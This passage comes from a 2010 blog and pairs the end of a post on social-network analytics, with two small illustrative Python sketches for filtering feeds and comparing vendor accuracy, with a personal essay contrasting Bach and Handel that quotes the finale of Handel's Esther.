6. Data feeds frequently go through secondary processing before they are presented to users.  This additional refinement may include the removal of partial records (e.g., those missing dates or user names) or offensive message content like cursing, pornography, or spam.  All this massaging further reduces the population size and the accuracy of the results.
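To make the last item concrete, here is a small sketch of the kind of secondary processing a feed might go through. Everything in it is hypothetical: the `Post` record, the `BLOCKLIST` words, and the five sample posts are made up for illustration and do not describe any real vendor's pipeline.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class Post:
    user: Optional[str]  # None when the scraper lost the user name
    date: Optional[str]  # None when the scraper lost the timestamp
    text: str


# Hypothetical blocklist standing in for a vendor's offensive-content filter.
BLOCKLIST = {"spam", "viagra"}


def is_complete(post: Post) -> bool:
    """A record is complete only if both user and date survived scraping."""
    return bool(post.user) and bool(post.date)


def is_clean(post: Post) -> bool:
    """A record is clean if none of its words appear on the blocklist."""
    words = post.text.lower().split()
    return not any(word in BLOCKLIST for word in words)


def refine(posts):
    """Keep only the records that are both complete and clean."""
    return [p for p in posts if is_complete(p) and is_clean(p)]


# Made-up sample feed.
raw_feed = [
    Post("alice", "2010-11-02", "Love my new camera"),
    Post(None, "2010-11-02", "This camera is terrible"),
    Post("bob", None, "Battery died after a week"),
    Post("carol", "2010-11-03", "Cheap viagra here"),
    Post("dave", "2010-11-03", "Decent camera for the price"),
]

refined_feed = refine(raw_feed)
retention = len(refined_feed) / len(raw_feed)
print(f"Kept {len(refined_feed)} of {len(raw_feed)} posts ({retention:.0%})")
```

In this toy feed only two of the five posts survive, and both of the legitimate complaints are among the casualties because of missing fields. The sample gets smaller and more positive than the raw conversation, which is exactly the kind of skew described above.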

So what is the moral of the story?  If you are on a quest for the SN analytics holy grail, you won’t find it, because it all depends on how much YOU are willing to compromise in terms of data sample size, quality and accuracy.

If you are in the market for an SN analytics tool, don’t take any chances by committing to a specific solution before doing your homework.  Ask the vendor to explain to you (in 8th grade level English) how they address the six items mentioned above.  Arrange for a trial period with at least three vendors and then compare their analytics to each other and to a benchmark known to you.  This should give you a sense of how accurate the tool is and the margin of error you can expect moving forward.
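One simple way to run that comparison is to score each vendor by how far its numbers stray from your benchmark. The sketch below uses mean absolute percentage error for this; the metric names, the vendor names, and all of the counts are invented for illustration, and a real trial would likely need more metrics and a longer observation window.

```python
def mean_abs_pct_error(reported, benchmark):
    """Average relative deviation of a vendor's figures from the benchmark."""
    errors = [
        abs(reported[metric] - benchmark[metric]) / benchmark[metric]
        for metric in benchmark
    ]
    return sum(errors) / len(errors)


# Hypothetical benchmark: counts you established yourself for a known campaign.
benchmark = {"mentions": 1000, "positive": 400, "negative": 100}

# Hypothetical trial results from three vendors for the same campaign.
vendors = {
    "vendor_a": {"mentions": 900, "positive": 440, "negative": 100},
    "vendor_b": {"mentions": 500, "positive": 200, "negative": 50},
    "vendor_c": {"mentions": 1100, "positive": 400, "negative": 130},
}

# Rank the vendors from most to least accurate against the benchmark.
ranking = sorted(vendors, key=lambda v: mean_abs_pct_error(vendors[v], benchmark))

for name in ranking:
    error = mean_abs_pct_error(vendors[name], benchmark)
    print(f"{name}: {error:.1%} average deviation from benchmark")
```

The average deviation doubles as a rough margin of error for each tool, as long as you remember it only holds for the kind of campaign you benchmarked.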

 

© Copyright 2010 Yaacov Apelbaum All Rights Reserved

Descend, ye Cedars, Haste ye Pines

Yaacov Apelbaum-Solomon Temple

After much procrastination, I’ve finally taken the plunge and digitized our CD collection. It was a colossal, multi-month project, but now, hundreds of hours of streaming music later, I have had the opportunity to reevaluate Bach and Handel, two of my favorite composers.

Bach and Handel share some interesting history. They were born only 4 weeks apart (Bach 31 March 1685 – Handel 23 February 1685), grew up 60 miles from each other, used the same snake oil salesman eye surgeon (John Taylor), and even passed on the opportunity to marry Buxtehude’s daughter Anna Margareta.  Despite their parallel lives, each eventually developed a distinctive musical style, and while both had strong religious convictions, Bach raised a large family (20 children) whereas Handel remained a bachelor.

Yaacov Apelbaum-Bach

For me, Bach’s music is a pure intellectual experience. I find his work to have an almost algorithmic quality.  With a few descending organ notes in the Toccata and Fugue in D Minor, Bach rips the universe wide open, revealing God’s mathematical handiwork everywhere.

 

Yaacov Apelbaum-Handel

Handel, on the other hand, mounts a direct assault on your emotions.  He first floats the theme, and then in repeating iterations he drives it in (almost all of his oratorios follow this MO).  Never verbose, he creates the ultimate expression of human kinship with and longing for the divine through minimalist orchestration.

 

As for artistic evolution, Bach’s style remained more or less constant throughout his career and he showed little or no interest in new technologies (he rejected the pianoforte because it sounded too mellow and was limited in its expressiveness as compared to the harpsichord).  Handel, on the other hand, was a great experimenter and his style was agnostic.  He wrote Esther almost a decade before it was performed privately but then shelved it because he realized that the audience wasn’t ready. It is noteworthy that in the end, it was Handel, the undisputed master of the Italian opera, who eventually did away with this pompous and pretentious genre and replaced it with the clean and concise style of the oratorio.

Yaacov Apelbaum-Solomon's Temple

One example of how Handel uses simple orchestration and words as an effective substitute for the contemporary Broadway mega operas can be found in the closing part of Esther. Handel dedicates over eleven minutes to a choral tour de force on the rebuilding of the Temple in Jerusalem.  This finale is made up of only eight lines of text with trumpet accompaniment, a simple chorus line, and dueling basses, but the effect is breathtaking.


Chorus
For ever bless’d be thy holy name,
Let Heav’n and earth his praise proclaim.

The Lord his people shall restore,
And we in Salem shall adore.

Mount Lebanon his firs resigns,
Descend, ye Cedars, haste ye Pines
To build the temple of the Lord,
For God his people has restor’d.

No siree!  They don’t write music like that anymore.

© Copyright 2010 Yaacov Apelbaum All Rights Reserved